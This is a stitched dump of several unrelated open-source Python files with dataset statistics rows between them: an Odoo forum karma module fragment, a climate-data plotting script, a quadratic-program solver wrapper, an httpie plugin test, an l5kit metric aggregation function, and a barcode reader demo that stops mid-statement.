self.pool['email.template'].send_mail(cr, SUPERUSER_ID, activation_template_id, user_id, force_send=True, context=tpl_ctx)
return True
def process_forum_validation_token(self, cr, uid, token, user_id, email, forum_id=None, context=None):
validation_token = self.pool['res.users']._generate_forum_token(cr, uid, user_id, email)
user = self.pool['res.users'].browse(cr, SUPERUSER_ID, user_id, context=context)
if token == validation_token and user.karma == 0:
karma = 3
if not forum_id:
forum_ids = self.pool['forum.forum'].search(cr, uid, [], limit=1, context=context)
if forum_ids:
forum_id = forum_ids[0]
if forum_id:
forum = self.pool['forum.forum'].browse(cr, uid, forum_id, context=context)
# karma gained: karma to ask a question and have 2 downvotes
karma = forum.karma_ask + (-2 * forum.karma_gen_question_downvote)
return user.write({'karma': karma})
return False
def add_karma(self, cr, uid, ids, karma, context=None):
for user in self.browse(cr, uid, ids, context=context):
self.write(cr, uid, [user.id], {'karma': user.karma + karma}, context=context)
return True
def get_serialised_gamification_summary(self, cr, uid, excluded_categories=None, context=None):
if isinstance(excluded_categories, list):
if 'forum' not in excluded_categories:
excluded_categories.append('forum')
else:
excluded_categories = ['forum']
return super(Users, self).get_serialised_gamification_summary(cr, uid, excluded_categories=excluded_categories, context=context)
| 49.980769 | 151 | 0.630242 | 671 | 5,198 | 4.655738 | 0.228018 | 0.03041 | 0.017286 | 0.021127 | 0.227593 | 0.200704 | 0.152689 | 0.086428 | 0.086428 | 0.086428 | 0 | 0.004053 | 0.240477 | 5,198 | 103 | 152 | 50.466019 | 0.787234 | 0.064255 | 0 | 0.048193 | 0 | 0 | 0.144541 | 0.020678 | 0 | 0 | 0 | 0 | 0 | 1 | 0.084337 | false | 0 | 0.060241 | 0 | 0.289157 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
651ee3b9a5875777f0b64fee44f532e1d5e39624 | 2,183 | py | Python | fig_02_example_fit.py | terhardt/DO-progression | 7ac2cdd5fb5ea48a66edb4fffd44285d607b1027 | [
"MIT"
] | null | null | null | fig_02_example_fit.py | terhardt/DO-progression | 7ac2cdd5fb5ea48a66edb4fffd44285d607b1027 | [
"MIT"
] | null | null | null | fig_02_example_fit.py | terhardt/DO-progression | 7ac2cdd5fb5ea48a66edb4fffd44285d607b1027 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import joblib as jl
from code.model import linear_ramp
from code.plotting import parcolors
from scipy.stats import gaussian_kde
def calc_med_iqr(y, q=[5, 95], axis=None):
qs = np.percentile(y, [q[0], 50, q[-1]], axis=axis)
yerr = np.diff(qs, axis=0)
y = qs[1]
return y, yerr
gi_table = pd.read_table('data/GIS_table.txt', comment='#')
par = 'Ca'
event = 'GI-8c'
ref_age = gi_table.loc[gi_table['Event'] == 'GI-8c', 'Age'].values
data_file = 'data/ramp_data/NGRIP_%s_%s.csv' % (event, par)
t, obs = pd.read_csv(data_file).values.T
t_plot = (ref_age - t) / 1000
traces = jl.load('ramp_fits/traces/NGRIP.gz')
traces = np.array(traces.sel(param=par, event=event))
ramps = np.array([linear_ramp(t, *p) for p in traces[:, :4]])
r_med, r_err = calc_med_iqr(ramps, axis=0)
fig, axes = plt.subplots(nrows=2, ncols=1, sharex=True, sharey=False,
gridspec_kw={'height_ratios': [2, 1]},
figsize=(3.5, 1.411 * 3.5))
fig.subplots_adjust(hspace=0.0)
axes[0].set_title('Onset of %s' % event)
axes[0].set_ylabel(r'$\ln(\mathrm{%s} \cdot \mathrm{ppb}^{-1})$' % par)
axes[1].set_xlabel('GICC05 Age (kyr before 1950)')
axes[1].set_ylabel('Marg. post. density\n(yr$^{-1}$)')
axes[0].plot(t_plot, obs, color=parcolors[par], lw=0.5)
axes[0].plot(t_plot, r_med, color='k')
axes[0].fill_between(t_plot, r_med - r_err[0], r_med + r_err[1],
alpha=.2, color='gray')
time_traces = (traces[:, 0],
traces[:, 0] + 0.5 * traces[:, 1],
traces[:, 0] + traces[:, 1])
amp_traces = (traces[:, 2],
traces[:, 2] + 0.5 * traces[:, 3],
traces[:, 2] + traces[:, 3])
for yt, tr in zip(amp_traces, time_traces):
kde = gaussian_kde(tr)
tr_med = np.median(tr)
l, = axes[1].plot(t_plot, kde(t), lw=1.0, color='k')
tmed, terr = calc_med_iqr(tr)
ymed, yerr = calc_med_iqr(yt)
for l, ax in zip(('a', 'b'), axes):
ax.text(0.01, 0.95, '(%s)' % l, ha='left', va='top', transform=ax.transAxes,
weight='bold', fontsize=7)
fig.savefig('figures/fig_02_example_fit.pdf')
| 30.746479 | 80 | 0.608337 | 377 | 2,183 | 3.37931 | 0.405836 | 0.019623 | 0.031397 | 0.018838 | 0.021978 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043925 | 0.196977 | 2,183 | 70 | 81 | 31.185714 | 0.682829 | 0 | 0 | 0 | 0 | 0 | 0.125057 | 0.038937 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019608 | false | 0 | 0.137255 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
651f9fa4eae9ba17bd463c8fe66527cd4ed9376e | 13,968 | py | Python | module/interface.py | BerkeleyAutomation/rlqp-python | 55f378e496979bd00e84cea4583ac37bfaa571a9 | [
"Apache-2.0"
] | 4 | 2021-07-23T15:50:44.000Z | 2022-03-16T13:10:52.000Z | module/interface.py | BerkeleyAutomation/rlqp-python | 55f378e496979bd00e84cea4583ac37bfaa571a9 | [
"Apache-2.0"
] | null | null | null | module/interface.py | BerkeleyAutomation/rlqp-python | 55f378e496979bd00e84cea4583ac37bfaa571a9 | [
"Apache-2.0"
] | 1 | 2021-08-03T01:52:04.000Z | 2021-08-03T01:52:04.000Z | """
Python interface module for OSQP solver v0.6.2.post0
"""
from __future__ import print_function
from builtins import object
import rlqp._osqp as _osqp # Internal low level module
import numpy as np
import scipy.sparse as spa
from warnings import warn
from platform import system
import rlqp.codegen as cg
import rlqp.utils as utils
import sys
import qdldl
class OSQP(object):
def __init__(self):
self._model = _osqp.OSQP()
def version(self):
return self._model.version()
def setup(self, P=None, q=None, A=None, l=None, u=None, **settings):
"""
Setup OSQP solver problem of the form
minimize 1/2 x' * P * x + q' * x
subject to l <= A * x <= u
solver settings can be specified as additional keyword arguments
"""
# TODO(bart): this will be unnecessary when the derivative will be in C
self._derivative_cache = {'P': P, 'q': q, 'A': A, 'l': l, 'u': u}
unpacked_data, settings = utils.prepare_data(P, q, A, l, u, **settings)
self._model.setup(*unpacked_data, **settings)
def update(self, q=None, l=None, u=None,
Px=None, Px_idx=np.array([]), Ax=None, Ax_idx=np.array([])):
"""
Update OSQP problem arguments
"""
# get problem dimensions
(n, m) = self._model.dimensions()
# check consistency of the input arguments
if q is not None and len(q) != n:
raise ValueError("q must have length n")
if l is not None:
if not isinstance(l, np.ndarray):
raise TypeError("l must be numpy.ndarray, not %s" %
type(l).__name__)
elif len(l) != m:
raise ValueError("l must have length m")
# Convert values to -OSQP_INFTY
l = np.maximum(l, -_osqp.constant('OSQP_INFTY'))
if u is not None:
if not isinstance(u, np.ndarray):
raise TypeError("u must be numpy.ndarray, not %s" %
type(u).__name__)
elif len(u) != m:
raise ValueError("u must have length m")
# Convert values to OSQP_INFTY
u = np.minimum(u, _osqp.constant('OSQP_INFTY'))
if Ax is None:
if len(Ax_idx) > 0:
raise ValueError("Vector Ax has not been specified")
else:
if len(Ax_idx) > 0 and len(Ax) != len(Ax_idx):
raise ValueError("Ax and Ax_idx must have the same lengths")
if Px is None:
if len(Px_idx) > 0:
raise ValueError("Vector Px has not been specified")
else:
if len(Px_idx) > 0 and len(Px) != len(Px_idx):
raise ValueError("Px and Px_idx must have the same lengths")
if q is None and l is None and u is None and Px is None and Ax is None:
raise ValueError("No updatable data has been specified")
# update linear cost
if q is not None:
self._model.update_lin_cost(q)
# update lower bound
if l is not None and u is None:
self._model.update_lower_bound(l)
# update upper bound
if u is not None and l is None:
self._model.update_upper_bound(u)
# update bounds
if l is not None and u is not None:
self._model.update_bounds(l, u)
# update matrix P
if Px is not None and Ax is None:
self._model.update_P(Px, Px_idx, len(Px))
# update matrix A
if Ax is not None and Px is None:
self._model.update_A(Ax, Ax_idx, len(Ax))
# update matrices P and A
if Px is not None and Ax is not None:
self._model.update_P_A(Px, Px_idx, len(Px), Ax, Ax_idx, len(Ax))
# TODO(bart): this will be unnecessary when the derivative will be in C
# update problem data in self._derivative_cache
if q is not None:
self._derivative_cache["q"] = q
if l is not None:
self._derivative_cache["l"] = l
if u is not None:
self._derivative_cache["u"] = u
if Px is not None:
if Px_idx.size == 0:
self._derivative_cache["P"].data = Px
else:
self._derivative_cache["P"].data[Px_idx] = Px
if Ax is not None:
if Ax_idx.size == 0:
self._derivative_cache["A"].data = Ax
else:
self._derivative_cache["A"].data[Ax_idx] = Ax
# delete results from self._derivative_cache to prohibit
# taking the derivative of unsolved problems
if "results" in self._derivative_cache.keys():
del self._derivative_cache["results"]
def update_settings(self, **kwargs):
"""
Update OSQP solver settings
It is possible to change: 'max_iter', 'eps_abs', 'eps_rel',
'eps_prim_inf', 'eps_dual_inf', 'rho'
'alpha', 'delta', 'polish',
'polish_refine_iter',
'verbose', 'scaled_termination',
'check_termination', 'time_limit',
"""
# get arguments
max_iter = kwargs.pop('max_iter', None)
eps_abs = kwargs.pop('eps_abs', None)
eps_rel = kwargs.pop('eps_rel', None)
eps_prim_inf = kwargs.pop('eps_prim_inf', None)
eps_dual_inf = kwargs.pop('eps_dual_inf', None)
rho = kwargs.pop('rho', None)
alpha = kwargs.pop('alpha', None)
delta = kwargs.pop('delta', None)
polish = kwargs.pop('polish', None)
polish_refine_iter = kwargs.pop('polish_refine_iter', None)
verbose = kwargs.pop('verbose', None)
scaled_termination = kwargs.pop('scaled_termination', None)
check_termination = kwargs.pop('check_termination', None)
warm_start = kwargs.pop('warm_start', None)
time_limit = kwargs.pop('time_limit', None)
# update them
if max_iter is not None:
self._model.update_max_iter(max_iter)
if eps_abs is not None:
self._model.update_eps_abs(eps_abs)
if eps_rel is not None:
self._model.update_eps_rel(eps_rel)
if eps_prim_inf is not None:
self._model.update_eps_prim_inf(eps_prim_inf)
if eps_dual_inf is not None:
self._model.update_eps_dual_inf(eps_dual_inf)
if rho is not None:
self._model.update_rho(rho)
if alpha is not None:
self._model.update_alpha(alpha)
if delta is not None:
self._model.update_delta(delta)
if polish is not None:
self._model.update_polish(polish)
if polish_refine_iter is not None:
self._model.update_polish_refine_iter(polish_refine_iter)
if verbose is not None:
self._model.update_verbose(verbose)
if scaled_termination is not None:
self._model.update_scaled_termination(scaled_termination)
if check_termination is not None:
self._model.update_check_termination(check_termination)
if warm_start is not None:
self._model.update_warm_start(warm_start)
if time_limit is not None:
self._model.update_time_limit(time_limit)
if max_iter is None and \
eps_abs is None and \
eps_rel is None and \
eps_prim_inf is None and \
eps_dual_inf is None and \
rho is None and \
alpha is None and \
delta is None and \
polish is None and \
polish_refine_iter is None and \
verbose is None and \
scaled_termination is None and \
check_termination is None and \
warm_start is None:
raise ValueError("No updatable settings has been specified!")
def solve(self):
"""
Solve QP Problem
"""
# Solve QP
results = self._model.solve()
# TODO(bart): this will be unnecessary when the derivative will be in C
self._derivative_cache['results'] = results
return results
def warm_start(self, x=None, y=None):
"""
Warm start primal or dual variables
"""
# get problem dimensions
(n, m) = self._model.dimensions()
if x is not None:
if len(x) != n:
raise ValueError("Wrong dimension for variable x")
if y is None:
self._model.warm_start_x(x)
if y is not None:
if len(y) != m:
raise ValueError("Wrong dimension for variable y")
if x is None:
self._model.warm_start_y(y)
if x is not None and y is not None:
self._model.warm_start(x, y)
if x is None and y is None:
raise ValueError("Unrecognized fields")
def codegen(self, folder, project_type='', parameters='vectors',
python_ext_name='emosqp', force_rewrite=False,
FLOAT=False, LONG=True):
"""
Generate embeddable C code for the problem
"""
# Check parameters arguments
if parameters == 'vectors':
embedded = 1
elif parameters == 'matrices':
embedded = 2
else:
raise ValueError("Unknown value of 'parameters' argument.")
# Set float and long flags
if FLOAT:
float_flag = 'ON'
else:
float_flag = 'OFF'
if LONG:
long_flag = 'ON'
else:
long_flag = 'OFF'
# Check project_type argument
expectedProject = ('', 'Makefile', 'MinGW Makefiles',
'Unix Makefiles', 'CodeBlocks', 'Xcode')
if project_type not in expectedProject:
raise ValueError("Unknown value of 'project_type' argument.")
if project_type == 'Makefile':
if system() == 'Windows':
project_type = 'MinGW Makefiles'
elif system() == 'Linux' or system() == 'Darwin':
project_type = 'Unix Makefiles'
# Convert workspace to Python
sys.stdout.write("Getting workspace from OSQP object... \t\t\t\t")
sys.stdout.flush()
work = self._model._get_workspace()
print("[done]")
# Generate code with codegen module
cg.codegen(work, folder, python_ext_name, project_type,
embedded, force_rewrite, float_flag, long_flag)
def derivative_iterative_refinement(self, rhs, max_iter=20, tol=1e-12):
M = self._derivative_cache['M']
# Prefactor
solver = self._derivative_cache['solver']
sol = solver.solve(rhs)
for k in range(max_iter):
delta_sol = solver.solve(rhs - M @ sol)
sol = sol + delta_sol
if np.linalg.norm(M @ sol - rhs) < tol:
break
if k == max_iter - 1:
warn("max_iter iterative refinement reached.")
return sol
def adjoint_derivative(self, dx=None, dy_u=None, dy_l=None,
P_idx=None, A_idx=None, eps_iter_ref=1e-04):
"""
Compute adjoint derivative after solve.
"""
P, q = self._derivative_cache['P'], self._derivative_cache['q']
A = self._derivative_cache['A']
l, u = self._derivative_cache['l'], self._derivative_cache['u']
try:
results = self._derivative_cache['results']
except KeyError:
raise ValueError("Problem has not been solved. "
"You cannot take derivatives. "
"Please call the solve function.")
if results.info.status != "solved":
raise ValueError("Problem has not been solved to optimality. "
"You cannot take derivatives")
m, n = A.shape
x = results.x
y = results.y
y_u = np.maximum(y, 0)
y_l = -np.minimum(y, 0)
if A_idx is None:
A_idx = A.nonzero()
if P_idx is None:
P_idx = P.nonzero()
if dy_u is None:
dy_u = np.zeros(m)
if dy_l is None:
dy_l = np.zeros(m)
# Make sure M matrix exists
if 'M' not in self._derivative_cache:
# Multiply second-third row by diag(y_u)^-1 and diag(y_l)^-1
# to make the matrix symmetric
inv_dia_y_u = spa.diags(np.reciprocal(y_u + 1e-20))
inv_dia_y_l = spa.diags(np.reciprocal(y_l + 1e-20))
M = spa.bmat([
[P, A.T, -A.T],
[A, spa.diags(A @ x - u) @ inv_dia_y_u, None],
[-A, None, spa.diags(l - A @ x) @ inv_dia_y_l]
], format='csc')
delta = spa.bmat([[eps_iter_ref * spa.eye(n), None],
[None, -eps_iter_ref * spa.eye(2 * m)]],
format='csc')
self._derivative_cache['M'] = M
self._derivative_cache['solver'] = qdldl.Solver(M + delta)
rhs = - np.concatenate([dx, dy_u, dy_l])
r_sol = self.derivative_iterative_refinement(rhs)
r_x, r_yu, r_yl = np.split(r_sol, [n, n+m])
# Extract derivatives for the constraints
rows, cols = A_idx
dA_vals = (y_u[rows] - y_l[rows]) * r_x[cols] + \
(r_yu[rows] - r_yl[rows]) * x[cols]
dA = spa.csc_matrix((dA_vals, (rows, cols)), shape=A.shape)
du = - r_yu
dl = r_yl
# Extract derivatives for the cost (P, q)
rows, cols = P_idx
dP_vals = .5 * (r_x[rows] * x[cols] + r_x[cols] * x[rows])
dP = spa.csc_matrix((dP_vals, P_idx), shape=P.shape)
dq = r_x
return (dP, dq, dA, dl, du)
| 33.985401 | 79 | 0.551976 | 1,853 | 13,968 | 3.975175 | 0.158122 | 0.024437 | 0.043986 | 0.038827 | 0.303421 | 0.222509 | 0.129378 | 0.067744 | 0.038148 | 0.027559 | 0 | 0.003863 | 0.351303 | 13,968 | 410 | 80 | 34.068293 | 0.809072 | 0.128794 | 0 | 0.056818 | 0 | 0 | 0.095242 | 0 | 0 | 0 | 0 | 0.007317 | 0 | 1 | 0.037879 | false | 0 | 0.041667 | 0.003788 | 0.098485 | 0.007576 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6522f4a37572ca36893a43e31c84c4371a93cb9a | 750 | py | Python | tests.py | httpie/httpie-snapdsocket | aa0d58beca2475b461ba9eac420fff5583e67bed | [
"BSD-3-Clause"
] | 2 | 2021-07-05T09:51:13.000Z | 2021-07-05T10:21:09.000Z | tests.py | httpie/httpie-snapdsocket | aa0d58beca2475b461ba9eac420fff5583e67bed | [
"BSD-3-Clause"
] | 1 | 2021-07-05T11:51:30.000Z | 2021-07-05T12:00:52.000Z | tests.py | httpie/httpie-snapdsocket | aa0d58beca2475b461ba9eac420fff5583e67bed | [
"BSD-3-Clause"
] | null | null | null | from unittest import TestCase
from httpie.client import build_requests_session
from httpie.plugins.registry import plugin_manager
from httpie_snapdsocket import SnapdSocketTransportPlugin
class TestSnapdSocketTransportPlugin(TestCase):
def test_simple(self):
# Package containing unicode characters
package = 'open-syobon-action'
plugin_manager.register(SnapdSocketTransportPlugin)
try:
session = build_requests_session(True)
res = session.get('snapd:///v2/find?name=' + package).json()
self.assertTrue(isinstance(res, dict))
self.assertEqual(res['result'][0]['name'], package)
finally:
plugin_manager.unregister(SnapdSocketTransportPlugin)
| 34.090909 | 72 | 0.712 | 74 | 750 | 7.094595 | 0.621622 | 0.057143 | 0.07619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00335 | 0.204 | 750 | 21 | 73 | 35.714286 | 0.876047 | 0.049333 | 0 | 0 | 0 | 0 | 0.070323 | 0.030942 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.066667 | false | 0 | 0.266667 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
65233a043179900aaf998728bba519eeced66fa9 | 2,322 | py | Python | l5kit/l5kit/cle/scene_type_agg.py | cdicle-motional/l5kit | 4dc4ee5391479bb71f0b373f39c316f9eef5a961 | [
"Apache-2.0"
] | 1 | 2021-12-04T17:48:53.000Z | 2021-12-04T17:48:53.000Z | l5kit/l5kit/cle/scene_type_agg.py | cdicle-motional/l5kit | 4dc4ee5391479bb71f0b373f39c316f9eef5a961 | [
"Apache-2.0"
] | null | null | null | l5kit/l5kit/cle/scene_type_agg.py | cdicle-motional/l5kit | 4dc4ee5391479bb71f0b373f39c316f9eef5a961 | [
"Apache-2.0"
] | 1 | 2021-11-19T08:13:46.000Z | 2021-11-19T08:13:46.000Z | from collections import defaultdict
from typing import DefaultDict, Dict, List, Set, Tuple
import torch
from l5kit.cle.metric_set import L5MetricSet
def compute_cle_scene_type_aggregations(mset: L5MetricSet,
scene_ids_to_scene_types: List[List[str]],
list_validator_table_to_publish: List[str]) -> Dict[str, torch.Tensor]:
"""Compute the scene-type metric aggregations.
:param mset: metric set to aggregate by scene type
:param scene_ids_to_scene_types: list of scene type tags per scene
:param list_validator_table_to_publish: list of validators for which we return structured dictionary of results
:return: dict of result key "scene_type/validator_name" to scale tensor aggregation value.
"""
# Set of scene types in the validation set.
valid_scene_types: List[str] = \
list(set([scene_type for scene_types in scene_ids_to_scene_types for scene_type in scene_types]))
# Aggregate validator failures by scene type.
validator_failed_frames = mset.aggregate_failed_frames()
failed_scene_type_results: DefaultDict[Tuple[str, str], int] = defaultdict(int)
for vname, failed_frames in validator_failed_frames.items():
# Aggregate scenes and frames by scene type.
scene_set: DefaultDict[str, Set[int]] = defaultdict(set)
frame_count: DefaultDict[str, int] = defaultdict(int)
for scene_id, _ in failed_frames:
scene_id = scene_id.item()
for scene_type in scene_ids_to_scene_types[scene_id]:
if scene_id not in scene_set[scene_type]:
scene_set[scene_type].add(scene_id)
frame_count[scene_type] += 1
# Add scene aggregations.
for scene_type in scene_set:
scene_type_agg = len(scene_set[scene_type])
failed_scene_type_results[scene_type, vname] = scene_type_agg
# Aggregate pass/fail by scene type.
scene_type_results: Dict[str, torch.Tensor] = {}
for scene_type in valid_scene_types:
for vname in mset.evaluation_plan.validators_dict():
result_key = "/".join([scene_type, vname])
scene_type_results[result_key] = failed_scene_type_results[scene_type, vname]
return scene_type_results
| 45.529412 | 115 | 0.693368 | 314 | 2,322 | 4.828025 | 0.238854 | 0.166227 | 0.063325 | 0.039578 | 0.253958 | 0.149077 | 0.047493 | 0 | 0 | 0 | 0 | 0.002255 | 0.236003 | 2,322 | 50 | 116 | 46.44 | 0.852311 | 0.238587 | 0 | 0 | 0 | 0 | 0.000576 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0 | 0.137931 | 0 | 0.206897 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6524285319b0772331948a40c89a779d6c41fdfe | 8,714 | py | Python | demo/BarcodeReaderDemo.py | ZoroWang/python-barcode | a5fb175661dda768c5102ddbb236f0f831d708d3 | [
"OLDAP-2.5"
] | 13 | 2020-05-18T13:13:17.000Z | 2021-09-30T12:33:26.000Z | demo/BarcodeReaderDemo.py | ZoroWang/python-barcode | a5fb175661dda768c5102ddbb236f0f831d708d3 | [
"OLDAP-2.5"
] | 3 | 2020-08-17T02:16:14.000Z | 2021-10-08T00:59:27.000Z | demo/BarcodeReaderDemo.py | ZoroWang/python-barcode | a5fb175661dda768c5102ddbb236f0f831d708d3 | [
"OLDAP-2.5"
] | 10 | 2020-05-11T08:03:58.000Z | 2021-07-17T21:18:29.000Z | # -*-coding:utf-8-*-
import os
import sys
import json
import time
import glob
from dbr import *
reader = BarcodeReader()
Barcode_Format_Dict = {
'1': (EnumBarcodeFormat.BF_ALL, EnumBarcodeFormat_2.BF2_POSTALCODE | EnumBarcodeFormat_2.BF2_DOTCODE),
'2': (EnumBarcodeFormat.BF_ONED, EnumBarcodeFormat_2.BF2_NULL),
'3': (EnumBarcodeFormat.BF_QR_CODE, EnumBarcodeFormat_2.BF2_NULL),
'4': (EnumBarcodeFormat.BF_CODE_39, EnumBarcodeFormat_2.BF2_NULL),
'5': (EnumBarcodeFormat.BF_CODE_128, EnumBarcodeFormat_2.BF2_NULL),
'6': (EnumBarcodeFormat.BF_CODE_93, EnumBarcodeFormat_2.BF2_NULL),
'7': (EnumBarcodeFormat.BF_CODABAR, EnumBarcodeFormat_2.BF2_NULL),
'8': (EnumBarcodeFormat.BF_ITF, EnumBarcodeFormat_2.BF2_NULL),
'9': (EnumBarcodeFormat.BF_INDUSTRIAL_25, EnumBarcodeFormat_2.BF2_NULL),
'10': (EnumBarcodeFormat.BF_EAN_13, EnumBarcodeFormat_2.BF2_NULL),
'11': (EnumBarcodeFormat.BF_EAN_8, EnumBarcodeFormat_2.BF2_NULL),
'12': (EnumBarcodeFormat.BF_UPC_A, EnumBarcodeFormat_2.BF2_NULL),
'13': (EnumBarcodeFormat.BF_UPC_E, EnumBarcodeFormat_2.BF2_NULL),
'14': (EnumBarcodeFormat.BF_PDF417, EnumBarcodeFormat_2.BF2_NULL),
'15': (EnumBarcodeFormat.BF_DATAMATRIX, EnumBarcodeFormat_2.BF2_NULL),
'16': (EnumBarcodeFormat.BF_AZTEC, EnumBarcodeFormat_2.BF2_NULL),
'17': (EnumBarcodeFormat.BF_CODE_39_EXTENDED, EnumBarcodeFormat_2.BF2_NULL),
'18': (EnumBarcodeFormat.BF_MAXICODE, EnumBarcodeFormat_2.BF2_NULL),
'19': (EnumBarcodeFormat.BF_GS1_DATABAR, EnumBarcodeFormat_2.BF2_NULL),
'20': (EnumBarcodeFormat.BF_PATCHCODE, EnumBarcodeFormat_2.BF2_NULL),
'21': (EnumBarcodeFormat.BF_GS1_COMPOSITE, EnumBarcodeFormat_2.BF2_NULL),
'22': (EnumBarcodeFormat.BF_NULL, EnumBarcodeFormat_2.BF2_POSTALCODE),
'23': (EnumBarcodeFormat.BF_NULL, EnumBarcodeFormat_2.BF2_DOTCODE)
}
Template_Settings = {
'1': '{"ImageParameter":{'
'"Name":"BestCoverage",'
'"DeblurLevel":9,'
'"ExpectedBarcodesCount":512,'
'"ScaleDownThreshold":100000,'
'"LocalizationModes":['
'{"Mode":"LM_CONNECTED_BLOCKS"},'
'{"Mode":"LM_SCAN_DIRECTLY"},'
'{"Mode":"LM_STATISTICS"},'
'{"Mode":"LM_LINES"},'
'{"Mode":"LM_STATISTICS_MARKS"}],'
'"GrayscaleTransformationModes":['
'{"Mode":"GTM_ORIGINAL"},'
'{"Mode":"GTM_INVERTED"}]'
'}'
'}',
'2': '{"ImageParameter":{'
'"Name":"BestSpeed",'
'"DeblurLevel":3,'
'"ExpectedBarcodesCount":512,'
'"LocalizationModes":['
'{"Mode":"LM_SCAN_DIRECTLY"}],'
'"TextFilterModes":['
'{"MinImageDimension":262144,"Mode":"TFM_GENERAL_CONTOUR"}]'
'}'
'}',
'3': '{"ImageParameter":{'
'"Name":"Balance",'
'"DeblurLevel":5,'
'"ExpectedBarcodesCount":512,'
'"LocalizationModes":['
'{"Mode":"LM_CONNECTED_BLOCKS"},'
'{"Mode":"LM_STATISTICS"}]'
'}'
'}'
}
def init_runtime_settings():
while True:
print()
print("Step 2: Choose a template settings : ")
print("\t 1: Best Coverage Settings")
print("\t 2: Best Speed Settings")
print("\t 3: Balance Settings")
item = input()
if str(item) == 'q' or str(item) == 'Q':
print('Bye, looking forward to your next use.')
exit()
if str(item) not in Template_Settings.keys():
print('Please choose a valid number.')
continue
else:
reader.init_runtime_settings_with_string(Template_Settings[item])
break
def set_barcode_format():
while True:
print()
print("Step 3: Choose a number for the format(s) of your barcode image: ")
print("\t 1: All")
print("\t 2: OneD")
print("\t 3: QR Code")
print("\t 4: Code 39")
print("\t 5: Code 128")
print("\t 6: Code 93")
print("\t 7: Codabar")
print("\t 8: Interleaved 2 of 5")
print("\t 9: Industrial 2 of 5")
print("\t 10: EAN-13")
print("\t 11: EAN-8")
print("\t 12: UPC-A")
print("\t 13: UPC-E")
print("\t 14: PDF417")
print("\t 15: DATAMATRIX")
print("\t 16: AZTEC")
print("\t 17: Code 39 Extended")
print("\t 18: Maxicode")
print("\t 19: GS1 Databar")
print("\t 20: PatchCode")
print("\t 21: GS1 Composite")
print("\t 22: Postal Code")
print("\t 23: DotCode")
item = input()
if str(item) == 'q' or str(item) == 'Q':
print('Bye, looking forward to your next use.')
exit()
if str(item) not in Barcode_Format_Dict.keys():
print('Please choose a valid number.')
continue
else:
settings = reader.get_runtime_settings()
settings.barcode_format_ids = Barcode_Format_Dict[item][0]
settings.barcode_format_ids_2 = Barcode_Format_Dict[item][1]
reader.update_runtime_settings(settings)
break
def decode_file(path):
try:
start_time = time.time()
text_results = reader.decode_file(path)
end_time = time.time()
spend_time = (end_time - start_time)*1000
if text_results is not None:
print('Total barcode(s) found : {0}. Total time spent: {1} ms.'.format(len(text_results), spend_time))
i = 1
for text_result in text_results:
print("-------------")
print('Barcode {0}'.format(i))
print("Barcode Format : ")
print(text_result.barcode_format_string)
print("Barcode Text : ")
print(text_result.barcode_text)
print("Barcode Bytes : ")
print(text_result.barcode_bytes)
print("Localization Points : ")
print(text_result.localization_result.localization_points)
print("Exception : ")
print(text_result.exception)
print("-------------")
i = i + 1
else:
print("-------------")
print("No barcode found. Total time spent: {0} ms.".format(spend_time))
print("-------------")
except BarcodeReaderError as bre:
print(bre)
def decode_files(path):
for idx, img in enumerate(glob.glob(os.path.join(path, "*.*"))):
print('Image', idx + 1)
print(img)
print(40 * '#')
decode_file(img)
print(40 * '#')
if __name__ == '__main__':
license_key = "Input your own license"
# Apply for a trial license: https://www.dynamsoft.com/customer/license/trialLicense?product=dbr&utm_source=github
reader.init_license(license_key)
## The code snippet below shows how to use the full license in DBR 8.x:
# connection_paras = BarcodeReader.init_lts_connection_parameters()
## If DBR service is already built on your server, you can fill in the address of your server, or leave this property's default value.
# connection_paras.main_server_url = "Input your own server url"
# connection_paras.handshake_code = "Input your own handshake"
# connection_paras.deployment_type = EnumDMDeploymentType.DM_DT_DESKTOP
# connection_paras.uuid_generation_method = EnumDMUUIDGenerationMethod.DM_UUIDGM_RANDOM
# try:
# error = BarcodeReader.init_license_from_lts(connection_paras)
# if error[0] != EnumErrorCode.DBR_OK:
# print(error[1])
# except BarcodeReaderError as bre:
# print(bre)
print("*************************************************")
print("Welcome to Dynamsoft Barcode Reader Demo")
print("*************************************************")
print("Hints: Please input 'Q'or 'q' to quit the application.")
print()
while True:
path = input("Step 1: Input your image path or folder path:")
if path == 'q' or path == 'Q':
print('Bye, looking forward to your next use.')
exit()
if not os.path.exists(path):
print("The picture or folder path doesn't exist , please input a valid path.")
continue
init_runtime_settings()
set_barcode_format()
if os.path.isdir(path):
decode_files(path)
elif os.path.isfile(path):
decode_file(path)
else:
